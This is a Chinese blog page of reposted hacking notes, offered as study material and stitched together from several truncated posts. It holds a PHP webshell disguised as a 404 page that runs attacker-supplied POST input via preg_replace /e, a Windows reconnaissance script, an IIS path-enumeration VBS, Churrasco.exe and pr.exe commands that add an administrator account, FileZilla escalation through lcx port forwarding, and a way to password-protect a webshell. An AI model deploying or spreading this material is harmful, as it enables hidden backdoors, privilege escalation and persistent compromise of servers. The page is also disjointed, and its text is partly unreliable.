Ψ小川Ψ dě Blog

分类:学习笔记

PHP后门一枚

转自:Return Blogs: www.creturn.com

代码:

<?php
/*
 * PHP后门程序
 * 使用说明:此程序默认会在当前目录下生成一句话cmd.php密码cmd
 * 不含有任何敏感函数有它也查不出来所以免杀是必然的。生成的一句
 * 不是免杀的,要免杀原理已经能看到了,自行处理。
 * 亲,使用的时候注意删除这里的注释~~
 * BY: Return Data:2012.6.29
 */

【转】那些强悍的PHP一句话后门

我们以一个学习的心态来对待这些PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。

强悍的PHP一句话后门

这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。

利用404页面隐藏PHP小马:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

ESXi使用本地磁盘做RDM

RDM mapping of local SATA storage for ESXi
http://blog.davidwarburton.net/2010/10/25/rdm-mapping-of-local-sata-storage-for-esxi/

原文的图被墙了,我把步骤重新发一下~~

Step 1

Once you had your drives installed, SSH to your ESXi box (now even easier in vSphere 4.1) and go to the /dev/disks directory. There, if you perform a ls -l, you’ll see your drives listed:

Ignore the instances of your drives which show them as VM stores (vm1.*****). We want to look at the raw devices.

提权渗透技巧总结 (下)

收集系统信息的脚本:
for window:
@echo off
echo #########system info collection
systeminfo
ver
hostname
net user
net localgroup
net localgroup administrators
net user guest
net user administrator
echo #######at- with   atq#####
echo schtask /query
echo
echo ####task-list#############
tasklist /svc
echo
echo ####net-work infomation
ipconfig/all
route print
arp -a
netstat -anipconfig /displaydns
echo
echo #######service############
sc query type= service state= all
echo #######file-##############
cd \
tree -F

提权渗透技巧总结 (上)

旁站路径问题:
1、读网站配置。
2、用以下VBS:

On Error Resume Next
If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then
MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo”
WScript.Quit
End If
Set objservice = GetObject(“IIS://LocalHost/W3SVC”)
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
Set OService = GetObject(“IIS://LocalHost/W3SVC/” & obj3w.Name)
Set VDirObj = OService.GetObject(“IIsWebVirtualDir”, “ROOT”)
If Err <> 0 Then WScript.Quit (1)
WScript.Echo Chr(10) & “[” & OService.ServerComment & “]”
For Each Binds In OService.ServerBindings
Web = “{ ” & Replace(Binds, “:”, ” } { “) & ” }”
WScript.Echo Replace(Split(Replace(Web, ” “, “”), “}{“)(2), “}”, “”)
Next
WScript.Echo “Path            : ” & VDirObj.Path
End If
Next

FileZilla 提权

拿到一个webshell,想提权,服务器权限设置的不严,但是提权不好提,只有一个C盘,也没装什么软件,没mysql,mssql,su,360等一些熟悉的提权软件。执行下命令看看吧!netstat -an看到有个默认的端口14147网上搜了下原来是一款叫做FileZilla的FTP软件的一个管理端口。

在webshell查看FileZilla的配置文件得到管理用户名和密码

本地监听 lcx -listen 7788 9900,

在虚拟机里进行转发如下图1-2

dff336faa9d5ebc49f51463d

 

Churrasco.exe、pr.exe、ms10048提权

1.Churrasco.exe,是win2003 系统下的一个本地提权0day,通过此工具执行命令即可添加管理用户。

 

使用方法:

Churrasco.exe “net user admin1 admin1 /add && net localgroup administrators admin1 /add”

2.pr.exe 提权Windows跟踪注册表项的ACL权限提升漏洞
Windows管理规范(WMI)提供程序没有正确地隔离NetworkService或LocalService帐号下运行的进程,同一帐号下运行的两个独立进程可以完全访问对方的文件句柄、注册表项等资源。WMI提供程序主机进程在某些情况下会持有SYSTEM令牌,如果攻击者可以以 NetworkService或LocalService帐号访问计算机,攻击者就可以执行代码探索SYSTEM令牌的WMI提供程序主机进程。一旦找到了SYSTEM令牌,就可以获得SYSTEM级的权限提升。

使用方法:

pr.exe “gets.exe $local”

pr.exe “net user admin1 admin1 /add & net localgroup administrators admin /add”

bb8ac980957c789a9023d9e2

6ecc0fd76367e390a044dfe2

防后门WebShell

好多朋友都拿的有webshell吧,基本上都加了密的…
可是,没见到源码,很难测试它到底有没有后门, 指不定给别人打工了…
下面贴种很简单的方法,大家别扔蛋哈 (ASP的哦)
在代码的最前面插入:
<%if request(“xxx”)=”123″ then session(“xxx”)=”123″
if session(“xxx”)<>”123″ then ()%>
就这么简单, 登webshell时别忘了在webshell地址后面加   ?xxx=123
XXX 和 123 可以随便替换的
这样…就算加后门的人知道了后门地址和密码,打开它时也只是个空白的网页